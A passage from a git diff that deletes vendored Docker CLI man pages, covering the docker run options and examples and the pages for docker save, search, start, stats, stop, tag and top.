The name is useful when defining links (see **--link**) (or any -other place you need to identify a container). This works for both background -and foreground Docker containers. - -**--network**="*bridge*" - Set the Network mode for the container - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack. Note: the host mode gives the container full access to local system services such as D-bus and is therefore considered insecure. - '|': connect to a user-defined network - -**--network-alias**=[] - Add network-scoped alias for the container - -**--oom-kill-disable**=*true*|*false* - Whether to disable OOM Killer for the container or not. - -**--oom-score-adj**="" - Tune the host's OOM preferences for containers (accepts -1000 to 1000) - -**-P**, **--publish-all**=*true*|*false* - Publish all exposed ports to random ports on the host interfaces. The default is *false*. - - When set to true publish all exposed ports to the host interfaces. The -default is false. If the operator uses -P (or -p) then Docker will make the -exposed port accessible on the host and the ports will be available to any -client that can reach the host. When using -P, Docker will bind any exposed -port to a random port on the host within an *ephemeral port range* defined by -`/proc/sys/net/ipv4/ip_local_port_range`. To find the mapping between the host -ports and the exposed ports, use `docker port`. - -**-p**, **--publish**=[] - Publish a container's port, or range of ports, to the host. - - Format: `ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort` -Both hostPort and containerPort can be specified as a range of ports. -When specifying ranges for both, the number of container ports in the range must match the number of host ports in the range. 
-(e.g., `docker run -p 1234-1236:1222-1224 --name thisWorks -t busybox` -but not `docker run -p 1230-1236:1230-1240 --name RangeContainerPortsBiggerThanRangeHostPorts -t busybox`) -With ip: `docker run -p 127.0.0.1:$HOSTPORT:$CONTAINERPORT --name CONTAINER -t someimage` -Use `docker port` to see the actual mapping: `docker port CONTAINER $CONTAINERPORT` - -**--pid**="" - Set the PID mode for the container - Default is to create a private PID namespace for the container - 'container:': join another container's PID namespace - 'host': use the host's PID namespace for the container. Note: the host mode gives the container full access to local PID and is therefore considered insecure. - -**--userns**="" - Set the usernamespace mode for the container when `userns-remap` option is enabled. - **host**: use the host usernamespace and enable all privileged options (e.g., `pid=host` or `--privileged`). - -**--pids-limit**="" - Tune the container's pids limit. Set `-1` to have unlimited pids for the container. - -**--uts**=*host* - Set the UTS mode for the container - **host**: use the host's UTS namespace inside the container. - Note: the host mode gives the container access to changing the host's hostname and is therefore considered insecure. - -**--privileged**=*true*|*false* - Give extended privileges to this container. The default is *false*. - - By default, Docker containers are -“unprivileged” (=false) and cannot, for example, run a Docker daemon inside the -Docker container. This is because by default a container is not allowed to -access any devices. A “privileged” container is given access to all devices. - - When the operator executes **docker run --privileged**, Docker will enable access -to all devices on the host as well as set some configuration in AppArmor to -allow the container nearly all the same access to the host as processes running -outside of a container on the host. 
- -**--read-only**=*true*|*false* - Mount the container's root filesystem as read only. - - By default a container will have its root filesystem writable allowing processes -to write files anywhere. By specifying the `--read-only` flag the container will have -its root filesystem mounted as read only prohibiting any writes. - -**--restart**="*no*" - Restart policy to apply when a container exits (no, on-failure[:max-retry], always, unless-stopped). - -**--rm**=*true*|*false* - Automatically remove the container when it exits. The default is *false*. - `--rm` flag can work together with `-d`, and auto-removal will be done on daemon side. Note that it's -incompatible with any restart policy other than `none`. - -**--security-opt**=[] - Security Options - - "label=user:USER" : Set the label user for the container - "label=role:ROLE" : Set the label role for the container - "label=type:TYPE" : Set the label type for the container - "label=level:LEVEL" : Set the label level for the container - "label=disable" : Turn off label confinement for the container - "no-new-privileges" : Disable container processes from gaining additional privileges - - "seccomp=unconfined" : Turn off seccomp confinement for the container - "seccomp=profile.json : White listed syscalls seccomp Json file to be used as a seccomp filter - - "apparmor=unconfined" : Turn off apparmor confinement for the container - "apparmor=your-profile" : Set the apparmor confinement profile for the container - -**--storage-opt**=[] - Storage driver options per container - - $ docker run -it --storage-opt size=120G fedora /bin/bash - - This (size) will allow to set the container rootfs size to 120G at creation time. - This option is only available for the `devicemapper`, `btrfs`, `overlay2` and `zfs` graph drivers. - For the `devicemapper`, `btrfs` and `zfs` storage drivers, user cannot pass a size less than the Default BaseFS Size. 
- For the `overlay2` storage driver, the size option is only available if the backing fs is `xfs` and mounted with the `pquota` mount option. - Under these conditions, user can pass any size less then the backing fs size. - -**--stop-signal**=*SIGTERM* - Signal to stop a container. Default is SIGTERM. - -**--stop-timeout**=*10* - Timeout (in seconds) to stop a container. Default is 10. - -**--shm-size**="" - Size of `/dev/shm`. The format is ``. - `number` must be greater than `0`. Unit is optional and can be `b` (bytes), `k` (kilobytes), `m`(megabytes), or `g` (gigabytes). - If you omit the unit, the system uses bytes. If you omit the size entirely, the system uses `64m`. - -**--sysctl**=SYSCTL - Configure namespaced kernel parameters at runtime - - IPC Namespace - current sysctls allowed: - - kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced - Sysctls beginning with fs.mqueue.* - - If you use the `--ipc=host` option these sysctls will not be allowed. - - Network Namespace - current sysctls allowed: - Sysctls beginning with net.* - - If you use the `--network=host` option these sysctls will not be allowed. - -**--sig-proxy**=*true*|*false* - Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied. The default is *true*. - -**--memory-swappiness**="" - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. - -**-t**, **--tty**=*true*|*false* - Allocate a pseudo-TTY. The default is *false*. - - When set to true Docker can allocate a pseudo-tty and attach to the standard -input of any container. This can be used, for example, to run a throwaway -interactive shell. The default is false. - -The **-t** option is incompatible with a redirection of the docker client -standard input. 
- -**--tmpfs**=[] Create a tmpfs mount - - Mount a temporary filesystem (`tmpfs`) mount into a container, for example: - - $ docker run -d --tmpfs /tmp:rw,size=787448k,mode=1777 my_image - - This command mounts a `tmpfs` at `/tmp` within the container. The supported mount -options are the same as the Linux default `mount` flags. If you do not specify -any options, the systems uses the following options: -`rw,noexec,nosuid,nodev,size=65536k`. - -**-u**, **--user**="" - Sets the username or UID used and optionally the groupname or GID for the specified command. - - The followings examples are all valid: - --user [user | user:group | uid | uid:gid | user:gid | uid:group ] - - Without this argument the command will be run as root in the container. - -**--ulimit**=[] - Ulimit options - -**-v**|**--volume**[=*[[HOST-DIR:]CONTAINER-DIR[:OPTIONS]]*] - Create a bind mount. If you specify, ` -v /HOST-DIR:/CONTAINER-DIR`, Docker - bind mounts `/HOST-DIR` in the host to `/CONTAINER-DIR` in the Docker - container. If 'HOST-DIR' is omitted, Docker automatically creates the new - volume on the host. The `OPTIONS` are a comma delimited list and can be: - - * [rw|ro] - * [z|Z] - * [`[r]shared`|`[r]slave`|`[r]private`] - * [nocopy] - -The `CONTAINER-DIR` must be an absolute path such as `/src/docs`. The `HOST-DIR` -can be an absolute path or a `name` value. A `name` value must start with an -alphanumeric character, followed by `a-z0-9`, `_` (underscore), `.` (period) or -`-` (hyphen). An absolute path starts with a `/` (forward slash). - -If you supply a `HOST-DIR` that is an absolute path, Docker bind-mounts to the -path you specify. If you supply a `name`, Docker creates a named volume by that -`name`. For example, you can specify either `/foo` or `foo` for a `HOST-DIR` -value. If you supply the `/foo` value, Docker creates a bind-mount. If you -supply the `foo` specification, Docker creates a named volume. 
- -You can specify multiple **-v** options to mount one or more mounts to a -container. To use these same mounts in other containers, specify the -**--volumes-from** option also. - -You can add `:ro` or `:rw` suffix to a volume to mount it read-only or -read-write mode, respectively. By default, the volumes are mounted read-write. -See examples. - -Labeling systems like SELinux require that proper labels are placed on volume -content mounted into a container. Without a label, the security system might -prevent the processes running inside the container from using the content. By -default, Docker does not change the labels set by the OS. - -To change a label in the container context, you can add either of two suffixes -`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file -objects on the shared volumes. The `z` option tells Docker that two containers -share the volume content. As a result, Docker labels the content with a shared -content label. Shared volume labels allow all containers to read/write content. -The `Z` option tells Docker to label the content with a private unshared label. -Only the current container can use a private volume. - -By default bind mounted volumes are `private`. That means any mounts done -inside container will not be visible on host and vice-a-versa. One can change -this behavior by specifying a volume mount propagation property. Making a -volume `shared` mounts done under that volume inside container will be -visible on host and vice-a-versa. Making a volume `slave` enables only one -way mount propagation and that is mounts done on host under that volume -will be visible inside container but not the other way around. - -To control mount propagation property of volume one can use `:[r]shared`, -`:[r]slave` or `:[r]private` propagation flag. Propagation property can -be specified only for bind mounted volumes and not for internal volumes or -named volumes. 
For mount propagation to work source mount point (mount point -where source dir is mounted on) has to have right propagation properties. For -shared volumes, source mount point has to be shared. And for slave volumes, -source mount has to be either shared or slave. - -Use `df ` to figure out the source mount and then use -`findmnt -o TARGET,PROPAGATION ` to figure out propagation -properties of source mount. If `findmnt` utility is not available, then one -can look at mount entry for source mount point in `/proc/self/mountinfo`. Look -at `optional fields` and see if any propagaion properties are specified. -`shared:X` means mount is `shared`, `master:X` means mount is `slave` and if -nothing is there that means mount is `private`. - -To change propagation properties of a mount point use `mount` command. For -example, if one wants to bind mount source directory `/foo` one can do -`mount --bind /foo /foo` and `mount --make-private --make-shared /foo`. This -will convert /foo into a `shared` mount point. Alternatively one can directly -change propagation properties of source mount. Say `/` is source mount for -`/foo`, then use `mount --make-shared /` to convert `/` into a `shared` mount. - -> **Note**: -> When using systemd to manage the Docker daemon's start and stop, in the systemd -> unit file there is an option to control mount propagation for the Docker daemon -> itself, called `MountFlags`. The value of this setting may cause Docker to not -> see mount propagation changes made on the mount point. For example, if this value -> is `slave`, you may not be able to use the `shared` or `rshared` propagation on -> a volume. - -To disable automatic copying of data from the container path to the volume, use -the `nocopy` flag. The `nocopy` flag can be set on bind mounts and named volumes. - -**--volume-driver**="" - Container's volume driver. This driver creates volumes specified either from - a Dockerfile's `VOLUME` instruction or from the `docker run -v` flag. 
- See **docker-volume-create(1)** for full details. - -**--volumes-from**=[] - Mount volumes from the specified container(s) - - Mounts already mounted volumes from a source container onto another - container. You must supply the source's container-id. To share - a volume, use the **--volumes-from** option when running - the target container. You can share volumes even if the source container - is not running. - - By default, Docker mounts the volumes in the same mode (read-write or - read-only) as it is mounted in the source container. Optionally, you - can change this by suffixing the container-id with either the `:ro` or - `:rw ` keyword. - - If the location of the volume from the source container overlaps with - data residing on a target container, then the volume hides - that data on the target. - -**-w**, **--workdir**="" - Working directory inside the container - - The default working directory for -running binaries within a container is the root directory (/). The developer can -set a different default with the Dockerfile WORKDIR instruction. The operator -can override the working directory by using the **-w** option. - -# Exit Status - -The exit code from `docker run` gives information about why the container -failed to run or why it exited. When `docker run` exits with a non-zero code, -the exit codes follow the `chroot` standard, see below: - -**_125_** if the error is with Docker daemon **_itself_** - - $ docker run --foo busybox; echo $? - # flag provided but not defined: --foo - See 'docker run --help'. - 125 - -**_126_** if the **_contained command_** cannot be invoked - - $ docker run busybox /etc; echo $? - # exec: "/etc": permission denied - docker: Error response from daemon: Contained command could not be invoked - 126 - -**_127_** if the **_contained command_** cannot be found - - $ docker run busybox foo; echo $? 
- # exec: "foo": executable file not found in $PATH - docker: Error response from daemon: Contained command not found or does not exist - 127 - -**_Exit code_** of **_contained command_** otherwise - - $ docker run busybox /bin/sh -c 'exit 3' - # 3 - -# EXAMPLES - -## Running container in read-only mode - -During container image development, containers often need to write to the image -content. Installing packages into /usr, for example. In production, -applications seldom need to write to the image. Container applications write -to volumes if they need to write to file systems at all. Applications can be -made more secure by running them in read-only mode using the --read-only switch. -This protects the containers image from modification. Read only containers may -still need to write temporary data. The best way to handle this is to mount -tmpfs directories on /run and /tmp. - - # docker run --read-only --tmpfs /run --tmpfs /tmp -i -t fedora /bin/bash - -## Exposing log messages from the container to the host's log - -If you want messages that are logged in your container to show up in the host's -syslog/journal then you should bind mount the /dev/log directory as follows. - - # docker run -v /dev/log:/dev/log -i -t fedora /bin/bash - -From inside the container you can test this by sending a message to the log. - - (bash)# logger "Hello from my container" - -Then exit and check the journal. - - # exit - - # journalctl -b | grep Hello - -This should list the message sent to logger. - -## Attaching to one or more from STDIN, STDOUT, STDERR - -If you do not specify -a then Docker will attach everything (stdin,stdout,stderr) -. 
You can specify to which of the three standard streams (stdin, stdout, stderr) -you'd like to connect instead, as in: - - # docker run -a stdin -a stdout -i -t fedora /bin/bash - -## Sharing IPC between containers - -Using shm_server.c available here: https://www.cs.cf.ac.uk/Dave/C/node27.html - -Testing `--ipc=host` mode: - -Host shows a shared memory segment with 7 pids attached, happens to be from httpd: - -``` - $ sudo ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x01128e25 0 root 600 1000 7 -``` - -Now run a regular container, and it correctly does NOT see the shared memory segment from the host: - -``` - $ docker run -it shm ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status -``` - -Run a container with the new `--ipc=host` option, and it now sees the shared memory segment from the host httpd: - - ``` - $ docker run -it --ipc=host shm ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x01128e25 0 root 600 1000 7 -``` -Testing `--ipc=container:CONTAINERID` mode: - -Start a container with a program to create a shared memory segment: -``` - $ docker run -it shm bash - $ sudo shm/shm_server & - $ sudo ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x0000162e 0 root 666 27 1 -``` -Create a 2nd container correctly shows no shared memory segment from 1st container: -``` - $ docker run shm ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status -``` - -Create a 3rd container using the new --ipc=container:CONTAINERID option, now it shows the shared memory segment from the first: - -``` - $ docker run -it --ipc=container:ed735b2264ac shm ipcs -m - $ sudo ipcs -m - - ------ Shared Memory Segments -------- - key shmid owner perms bytes nattch status - 0x0000162e 0 root 666 27 1 -``` - -## Linking Containers - -> **Note**: This section 
describes linking between containers on the -> default (bridge) network, also known as "legacy links". Using `--link` -> on user-defined networks uses the DNS-based discovery, which does not add -> entries to `/etc/hosts`, and does not set environment variables for -> discovery. - -The link feature allows multiple containers to communicate with each other. For -example, a container whose Dockerfile has exposed port 80 can be run and named -as follows: - - # docker run --name=link-test -d -i -t fedora/httpd - -A second container, in this case called linker, can communicate with the httpd -container, named link-test, by running with the **--link=:** - - # docker run -t -i --link=link-test:lt --name=linker fedora /bin/bash - -Now the container linker is linked to container link-test with the alias lt. -Running the **env** command in the linker container shows environment variables - with the LT (alias) context (**LT_**) - - # env - HOSTNAME=668231cb0978 - TERM=xterm - LT_PORT_80_TCP=tcp://172.17.0.3:80 - LT_PORT_80_TCP_PORT=80 - LT_PORT_80_TCP_PROTO=tcp - LT_PORT=tcp://172.17.0.3:80 - PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin - PWD=/ - LT_NAME=/linker/lt - SHLVL=1 - HOME=/ - LT_PORT_80_TCP_ADDR=172.17.0.3 - _=/usr/bin/env - -When linking two containers Docker will use the exposed ports of the container -to create a secure tunnel for the parent to access. - -If a container is connected to the default bridge network and `linked` -with other containers, then the container's `/etc/hosts` file is updated -with the linked container's name. - -> **Note** Since Docker may live update the container's `/etc/hosts` file, there -may be situations when processes inside the container can end up reading an -empty or incomplete `/etc/hosts` file. In most cases, retrying the read again -should fix the problem. - - -## Mapping Ports for External Usage - -The exposed port of an application can be mapped to a host port using the **-p** -flag. 
For example, an httpd port 80 can be mapped to the host port 8080 using the -following: - - # docker run -p 8080:80 -d -i -t fedora/httpd - -## Creating and Mounting a Data Volume Container - -Many applications require the sharing of persistent data across several -containers. Docker allows you to create a Data Volume Container that other -containers can mount from. For example, create a named container that contains -directories /var/volume1 and /tmp/volume2. The image will need to contain these -directories so a couple of RUN mkdir instructions might be required for you -fedora-data image: - - # docker run --name=data -v /var/volume1 -v /tmp/volume2 -i -t fedora-data true - # docker run --volumes-from=data --name=fedora-container1 -i -t fedora bash - -Multiple --volumes-from parameters will bring together multiple data volumes from -multiple containers. And it's possible to mount the volumes that came from the -DATA container in yet another container via the fedora-container1 intermediary -container, allowing to abstract the actual data source from users of that data: - - # docker run --volumes-from=fedora-container1 --name=fedora-container2 -i -t fedora bash - -## Mounting External Volumes - -To mount a host directory as a container volume, specify the absolute path to -the directory and the absolute path for the container directory separated by a -colon: - - # docker run -v /var/db:/data1 -i -t fedora bash - -When using SELinux, be aware that the host has no knowledge of container SELinux -policy. Therefore, in the above example, if SELinux policy is enforced, the -`/var/db` directory is not writable to the container. A "Permission Denied" -message will occur and an avc: message in the host's syslog. 
- - -To work around this, at time of writing this man page, the following command -needs to be run in order for the proper SELinux policy type label to be attached -to the host directory: - - # chcon -Rt svirt_sandbox_file_t /var/db - - -Now, writing to the /data1 volume in the container will be allowed and the -changes will also be reflected on the host in /var/db. - -## Using alternative security labeling - -You can override the default labeling scheme for each container by specifying -the `--security-opt` flag. For example, you can specify the MCS/MLS level, a -requirement for MLS systems. Specifying the level in the following command -allows you to share the same content between containers. - - # docker run --security-opt label=level:s0:c100,c200 -i -t fedora bash - -An MLS example might be: - - # docker run --security-opt label=level:TopSecret -i -t rhel7 bash - -To disable the security labeling for this container versus running with the -`--permissive` flag, use the following command: - - # docker run --security-opt label=disable -i -t fedora bash - -If you want a tighter security policy on the processes within a container, -you can specify an alternate type for the container. You could run a container -that is only allowed to listen on Apache ports by executing the following -command: - - # docker run --security-opt label=type:svirt_apache_t -i -t centos bash - -Note: - -You would have to write policy defining a `svirt_apache_t` type. - -## Setting device weight - -If you want to set `/dev/sda` device weight to `200`, you can specify the device -weight by `--blkio-weight-device` flag. Use the following command: - - # docker run -it --blkio-weight-device "/dev/sda:200" ubuntu - -## Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Microsoft Windows. The `--isolation ` option sets a container's isolation -technology. 
On Linux, the only supported is the `default` option which uses -Linux namespaces. These two commands are equivalent on Linux: - -``` -$ docker run -d busybox top -$ docker run -d --isolation default busybox top -``` - -On Microsoft Windows, can take any of these values: - -* `default`: Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. -* `process`: Namespace isolation only. -* `hyperv`: Hyper-V hypervisor partition-based isolation. - -In practice, when running on Microsoft Windows without a `daemon` option set, these two commands are equivalent: - -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation process busybox top -``` - -If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, any of these commands also result in `hyperv` isolation: - -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation hyperv busybox top -``` - -## Setting Namespaced Kernel Parameters (Sysctls) - -The `--sysctl` sets namespaced kernel parameters (sysctls) in the -container. For example, to turn on IP forwarding in the containers -network namespace, run this command: - - $ docker run --sysctl net.ipv4.ip_forward=1 someimage - -Note: - -Not all sysctls are namespaced. Docker does not support changing sysctls -inside of a container that also modify the host system. As the kernel -evolves we expect to see more sysctls become namespaced. - -See the definition of the `--sysctl` option above for the current list of -supported sysctls. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -November 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-save.1.md b/vendor/github.com/docker/docker/man/docker-save.1.md deleted file mode 100644 index 1d1de8a1df..0000000000 --- a/vendor/github.com/docker/docker/man/docker-save.1.md +++ /dev/null @@ -1,45 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-save - Save one or more images to a tar archive (streamed to STDOUT by default) - -# SYNOPSIS -**docker save** -[**--help**] -[**-o**|**--output**[=*OUTPUT*]] -IMAGE [IMAGE...] - -# DESCRIPTION -Produces a tarred repository to the standard output stream. Contains all -parent layers, and all tags + versions, or specified repo:tag. - -Stream to a file instead of STDOUT by using **-o**. - -# OPTIONS -**--help** - Print usage statement - -**-o**, **--output**="" - Write to a file, instead of STDOUT - -# EXAMPLES - -Save all fedora repository images to a fedora-all.tar and save the latest -fedora image to a fedora-latest.tar: - - $ docker save fedora > fedora-all.tar - $ docker save --output=fedora-latest.tar fedora:latest - $ ls -sh fedora-all.tar - 721M fedora-all.tar - $ ls -sh fedora-latest.tar - 367M fedora-latest.tar - -# See also -**docker-load(1)** to load an image from a tar archive on STDIN. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit -November 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-search.1.md b/vendor/github.com/docker/docker/man/docker-search.1.md deleted file mode 100644 index ad8bbc78b2..0000000000 --- a/vendor/github.com/docker/docker/man/docker-search.1.md +++ /dev/null @@ -1,70 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-search - Search the Docker Hub for images - -# SYNOPSIS -**docker search** -[**-f**|**--filter**[=*[]*]] -[**--help**] -[**--limit**[=*LIMIT*]] -[**--no-trunc**] -TERM - -# DESCRIPTION - -Search Docker Hub for images that match the specified `TERM`. The table -of images returned displays the name, description (truncated by default), number -of stars awarded, whether the image is official, and whether it is automated. - -*Note* - Search queries will only return up to 25 results - -# OPTIONS - -**-f**, **--filter**=[] - Filter output based on these conditions: - - stars= - - is-automated=(true|false) - - is-official=(true|false) - -**--help** - Print usage statement - -**--limit**=*LIMIT* - Maximum returned search results. The default is 25. - -**--no-trunc**=*true*|*false* - Don't truncate output. The default is *false*. - -# EXAMPLES - -## Search Docker Hub for ranked images - -Search a registry for the term 'fedora' and only display those images -ranked 3 or higher: - - $ docker search --filter=stars=3 fedora - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - mattdm/fedora A basic Fedora image corresponding roughly... 50 - fedora (Semi) Official Fedora base image. 38 - mattdm/fedora-small A small Fedora image on which to build. Co... 8 - goldmann/wildfly A WildFly application server running on a ... 
3 [OK] - -## Search Docker Hub for automated images - -Search Docker Hub for the term 'fedora' and only display automated images -ranked 1 or higher: - - $ docker search --filter=is-automated=true --filter=stars=1 fedora - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - goldmann/wildfly A WildFly application server running on a ... 3 [OK] - tutum/fedora-20 Fedora 20 image with SSH access. For the r... 1 [OK] - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -April 2016, updated by Vincent Demeester - diff --git a/vendor/github.com/docker/docker/man/docker-start.1.md b/vendor/github.com/docker/docker/man/docker-start.1.md deleted file mode 100644 index c00b0a1668..0000000000 --- a/vendor/github.com/docker/docker/man/docker-start.1.md +++ /dev/null @@ -1,39 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-start - Start one or more containers - -# SYNOPSIS -**docker start** -[**-a**|**--attach**] -[**--detach-keys**[=*[]*]] -[**--help**] -[**-i**|**--interactive**] -CONTAINER [CONTAINER...] - -# DESCRIPTION - -Start one or more containers. - -# OPTIONS -**-a**, **--attach**=*true*|*false* - Attach container's STDOUT and STDERR and forward all signals to the - process. The default is *false*. - -**--detach-keys**="" - Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. - -**--help** - Print usage statement - -**-i**, **--interactive**=*true*|*false* - Attach container's STDIN. The default is *false*. - -# See also -**docker-stop(1)** to stop a container. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. 
-June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-stats.1.md b/vendor/github.com/docker/docker/man/docker-stats.1.md deleted file mode 100644 index 0f022cd412..0000000000 --- a/vendor/github.com/docker/docker/man/docker-stats.1.md +++ /dev/null @@ -1,57 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-stats - Display a live stream of one or more containers' resource usage statistics - -# SYNOPSIS -**docker stats** -[**-a**|**--all**] -[**--help**] -[**--no-stream**] -[**--format[="*TEMPLATE*"]**] -[CONTAINER...] - -# DESCRIPTION - -Display a live stream of one or more containers' resource usage statistics - -# OPTIONS -**-a**, **--all**=*true*|*false* - Show all containers. Only running containers are shown by default. The default is *false*. - -**--help** - Print usage statement - -**--no-stream**=*true*|*false* - Disable streaming stats and only pull the first result, default setting is false. - -**--format**="*TEMPLATE*" - Pretty-print containers statistics using a Go template. - Valid placeholders: - .Container - Container name or ID. - .Name - Container name. - .ID - Container ID. - .CPUPerc - CPU percentage. - .MemUsage - Memory usage. - .NetIO - Network IO. - .BlockIO - Block IO. - .MemPerc - Memory percentage (Not available on Windows). - .PIDs - Number of PIDs (Not available on Windows). - -# EXAMPLES - -Running `docker stats` on all running containers - - $ docker stats - CONTAINER CPU % MEM USAGE / LIMIT MEM % NET I/O BLOCK I/O - 1285939c1fd3 0.07% 796 KiB / 64 MiB 1.21% 788 B / 648 B 3.568 MB / 512 KB - 9c76f7834ae2 0.07% 2.746 MiB / 64 MiB 4.29% 1.266 KB / 648 B 12.4 MB / 0 B - d1ea048f04e4 0.03% 4.583 MiB / 64 MiB 6.30% 2.854 KB / 648 B 27.7 MB / 0 B - -Running `docker stats` on multiple containers by name and id. 
- - $ docker stats fervent_panini 5acfcb1b4fd1 - CONTAINER CPU % MEM USAGE/LIMIT MEM % NET I/O - 5acfcb1b4fd1 0.00% 115.2 MiB/1.045 GiB 11.03% 1.422 kB/648 B - fervent_panini 0.02% 11.08 MiB/1.045 GiB 1.06% 648 B/648 B diff --git a/vendor/github.com/docker/docker/man/docker-stop.1.md b/vendor/github.com/docker/docker/man/docker-stop.1.md deleted file mode 100644 index fa377c92c4..0000000000 --- a/vendor/github.com/docker/docker/man/docker-stop.1.md +++ /dev/null @@ -1,30 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-stop - Stop a container by sending SIGTERM and then SIGKILL after a grace period - -# SYNOPSIS -**docker stop** -[**--help**] -[**-t**|**--time**[=*10*]] -CONTAINER [CONTAINER...] - -# DESCRIPTION -Stop a container (Send SIGTERM, and then SIGKILL after - grace period) - -# OPTIONS -**--help** - Print usage statement - -**-t**, **--time**=*10* - Number of seconds to wait for the container to stop before killing it. Default is 10 seconds. - -#See also -**docker-start(1)** to restart a stopped container. - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit diff --git a/vendor/github.com/docker/docker/man/docker-tag.1.md b/vendor/github.com/docker/docker/man/docker-tag.1.md deleted file mode 100644 index 7f27e1b0e1..0000000000 --- a/vendor/github.com/docker/docker/man/docker-tag.1.md +++ /dev/null @@ -1,76 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-tag - Create a tag `TARGET_IMAGE` that refers to `SOURCE_IMAGE` - -# SYNOPSIS -**docker tag** -[**--help**] -SOURCE_NAME[:TAG] TARGET_NAME[:TAG] - -# DESCRIPTION -Assigns a new alias to an image in a registry. An alias refers to the -entire image name including the optional `TAG` after the ':'. - -# "OPTIONS" -**--help** - Print usage statement. 
- -**NAME** - The image name which is made up of slash-separated name components, - optionally prefixed by a registry hostname. The hostname must comply with - standard DNS rules, but may not contain underscores. If a hostname is - present, it may optionally be followed by a port number in the format - `:8080`. If not present, the command uses Docker's public registry located at - `registry-1.docker.io` by default. Name components may contain lowercase - characters, digits and separators. A separator is defined as a period, one or - two underscores, or one or more dashes. A name component may not start or end - with a separator. - -**TAG** - The tag assigned to the image to version and distinguish images with the same - name. The tag name may contain lowercase and uppercase characters, digits, - underscores, periods and dashes. A tag name may not start with a period or a - dash and may contain a maximum of 128 characters. - -# EXAMPLES - -## Tagging an image referenced by ID - -To tag a local image with ID "0e5574283393" into the "fedora" repository with -"version1.0": - - docker tag 0e5574283393 fedora/httpd:version1.0 - -## Tagging an image referenced by Name - -To tag a local image with name "httpd" into the "fedora" repository with -"version1.0": - - docker tag httpd fedora/httpd:version1.0 - -Note that since the tag name is not specified, the alias is created for an -existing local version `httpd:latest`. - -## Tagging an image referenced by Name and Tag - -To tag a local image with name "httpd" and tag "test" into the "fedora" -repository with "version1.0.test": - - docker tag httpd:test fedora/httpd:version1.0.test - -## Tagging an image for a private repository - -To push an image to a private registry and not the central Docker -registry you must tag it with the registry hostname and port (if needed). 
- - docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0 - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -July 2014, updated by Sven Dowideit -April 2015, updated by Mary Anthony for v2 -June 2015, updated by Sally O'Malley diff --git a/vendor/github.com/docker/docker/man/docker-top.1.md b/vendor/github.com/docker/docker/man/docker-top.1.md deleted file mode 100644 index a666f7cd37..0000000000 --- a/vendor/github.com/docker/docker/man/docker-top.1.md +++ /dev/null @@ -1,36 +0,0 @@ -% DOCKER(1) Docker User Manuals -% Docker Community -% JUNE 2014 -# NAME -docker-top - Display the running processes of a container - -# SYNOPSIS -**docker top** -[**--help**] -CONTAINER [ps OPTIONS] - -# DESCRIPTION - -Display the running process of the container. ps-OPTION can be any of the options you would pass to a Linux ps command. - -All displayed information is from host's point of view. - -# OPTIONS -**--help** - Print usage statement - -# EXAMPLES - -Run **docker top** with the ps option of -x: - - $ docker top 8601afda2b -x - PID TTY STAT TIME COMMAND - 16623 ? Ss 0:00 sleep 99999 - - -# HISTORY -April 2014, Originally compiled by William Henry (whenry at redhat dot com) -based on docker.com source material and internal work. -June 2014, updated by Sven Dowideit -June 2015, updated by Ma Shimiao -December 2015, updated by Pavel Pospisil diff --git a/vendor/github.com/docker/docker/man/docker-unpause.1.md b/vendor/github.com/docker/docker/man/docker-unpause.1.md deleted file mode 100644 index e6fd3c4e01..0000000000 --- a/vendor/github.com/docker/docker/man/docker-unpause.1.md +++ /dev/null @@ -1,28 